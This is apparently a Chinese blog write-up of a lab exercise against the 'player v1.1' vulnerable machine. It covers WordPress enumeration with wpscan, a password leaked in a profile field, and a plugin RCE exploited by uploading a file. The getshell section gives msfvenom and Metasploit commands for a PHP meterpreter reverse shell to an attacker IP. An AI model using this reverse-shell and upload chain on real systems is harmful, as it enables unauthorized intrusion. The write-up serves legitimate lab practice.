player _v1.1靶机

一、确定ip

看到开启了数据库和web服务,访问80和3306端口

拼接js接口路径

二、目录扫描

拼接/javascrip显示没有权限

拼接/manual路径扫描也没发现有用信息

回到页面上发现网站路径为/var/www/html/g@web,访问一下

通过指纹识别发现其为wordpress

使用wpscan列出站点的用户和密码

在描述字段中发现一个密码hackNos@9012!!对其默认后台登录界面访问并尝试登录未成功

使用工具对其进行漏洞扫描

发现有rce漏洞 访问保存poc为html文件

最后一句话告诉我们上传的文件后缀和上传文件访问的位置

三、getshell

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.11LPORT=1234 x> shell.phtml

#生成木马文件

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST  192.168.1.14

set LPORT  1234

exploit

浏览器打开poc.html上传

访问文件位置http://192.168.1.14/g@web/wp-content/uploads/wpsp/


反弹成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值